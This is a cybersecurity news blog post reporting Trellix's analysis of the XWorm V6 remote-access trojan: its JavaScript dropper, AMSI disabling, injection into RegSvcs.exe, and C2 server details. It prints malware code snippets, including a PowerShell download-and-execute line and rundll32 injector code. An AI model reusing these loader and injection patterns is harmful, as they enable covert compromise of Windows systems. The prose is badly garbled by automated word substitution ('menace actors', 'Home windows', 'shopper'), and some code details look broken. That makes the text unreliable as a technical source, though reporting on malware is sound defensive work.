Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

New XWorm V6 Variant Injects Malicious Code into a Legitimate Windows Program

Posted on October 3, 2025October 3, 2025 By CWS

The resurgence of XWorm in mid-2025 marks a major escalation in malware sophistication.

After a lull following the abrupt discontinuation of official assist for model 5.6 in late 2024, menace actors unveiled XWorm V6.0 on June 4, 2025.

A put up on hackforums.internet by an account named XCoderTools first introduced this launch, claiming to patch a crucial distant code execution flaw current in earlier editions.

Submit made on hackforums[.]internet (Supply – Trellix)

Regardless of preliminary skepticism in regards to the creator’s authenticity, subsequent samples submitted to VirusTotal confirmed the malware’s speedy adoption amongst cybercriminals.

XWorm’s modular structure facilities round a core shopper and a set of plugins that allow different malicious actions—from credential theft to ransomware deployment.

As soon as the preliminary dropper executes, it employs a multi-stage an infection chain designed to evade detection and persist on compromised programs.

An infection chain of XWorm V6.0 (Supply – Trellix)

Trellix analysts famous that the attacker-delivered JavaScript installer disables Home windows Defender’s Antimalware Scan Interface earlier than launching a PowerShell script that masses an injector DLL.

By injecting code right into a legit Home windows course of corresponding to RegSvcs.exe, the malware successfully conceals its presence inside trusted system binaries.

Subsequent communication follows a well-defined protocol towards a command-and-control (C2) server at 94.159.113.64 over port 4411, utilizing an AES-encrypted channel and a default key of 666666.

As soon as linked, the shopper generates a novel machine identifier by hashing a mix of system parameters—username, OS model, processor depend, and listing sizes.

Technology of Consumer ID (Supply – Trellix)

This Consumer ID is saved beneath HKCU within the registry and used for all future plugin storage, encryption routines, and C2 transactions.

An infection Mechanism

Delving into XWorm V6’s an infection mechanism reveals a rigorously orchestrated sequence of actions. The preliminary payload arrives as a JavaScript (.js) file embedded in phishing emails or compromised web sites.

When executed, this script points a PowerShell command just like the next:-

$payload = (New-Object System.Web.WebClient).DownloadString(‘
Invoke-Expression $payload

The downloaded PowerShell content material first calls [System.Management.Automation.AmsiUtils]::ToggleAmsi(false) to disable AMSI scanning.

It then writes the injector DLL and the first XWorm shopper executable to %TEMP%, earlier than launching the DLL utilizing:-

Course of injector = new Course of();
injector.StartInfo.FileName = “rundll32.exe”;
injector.StartInfo.Arguments = “”%TEMP%injector.dll”,#1 “%TEMP%XWormClient.exe””;
injector.Begin();

By leveraging rundll32.exe, the injector maps malicious code into the handle house of RegSvcs.exe, making certain the Trojan runs beneath a legit course of context.

This stealthy method not solely bypasses utility whitelisting but additionally complicates forensic evaluation by scattering malicious elements throughout transient directories.

As soon as the payload is resident, the shopper calls dwelling to retrieve additional directions or plugins, that are delivered as Base64-encoded DLLs.

Every plugin’s SHA-256 hash is checked in opposition to the registry; if absent, the plugin is fetched and loaded instantly into reminiscence, negating the necessity for disk writes.

This memory-resident design considerably reduces the malware’s footprint and enhances persistence, making detection and remediation particularly difficult for defenders.

Observe us on Google Information, LinkedIn, and X to Get Extra Prompt Updates, Set CSN as a Most well-liked Supply in Google.

Cyber Security News Tags:Code, Injects, Legitimate, Malicious, Program, Variant, Windows, XWorm

Post navigation

Previous Post: Researchers Warn of Self-Spreading WhatsApp Malware Named SORVEPOTEL
Next Post: New AmCache EvilHunter Tool For Detecting Malicious Activities in Windows Systems

Related Posts

New Tykit Phishing Kit Mimics Microsoft 365 Login Pages to Steal Corporate Account Credentials Cyber Security News
ShinyHunters Possibly Collaborates With Scattered Spider in Salesforce Attack Campaigns Cyber Security News
What 2025 Taught Us About Modern Malware Cyber Security News
LockBit Operators Using Stealthy DLL Sideloading Technique to Load Malicious App as Legitimate One Cyber Security News
New GhostSocks Malware-as-a-Service Enables Threat Actors to Convert Compromised Devices into Proxies Cyber Security News
131 Malicious Extensions Targeting WhatsApp Used Found in Chrome Web Store Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Leveraging OSINT Tools for Enhanced Cybersecurity Threat Intelligence
  • Data Breach at Texas Gas Station Operator Exposes Info of 377,000+ Customers
  • MuddyWater Launches RustyWater RAT via Spear-Phishing Across Middle East Sectors
  • Europol Arrests 34 Black Axe Members in Spain Over €5.9M Fraud and Organized Crime
  • New MacSync Stealer Uses Signed macOS App to Evade Gatekeeper and Steal Data

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Leveraging OSINT Tools for Enhanced Cybersecurity Threat Intelligence
  • Data Breach at Texas Gas Station Operator Exposes Info of 377,000+ Customers
  • MuddyWater Launches RustyWater RAT via Spear-Phishing Across Middle East Sectors
  • Europol Arrests 34 Black Axe Members in Spain Over €5.9M Fraud and Organized Crime
  • New MacSync Stealer Uses Signed macOS App to Evade Gatekeeper and Steal Data

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark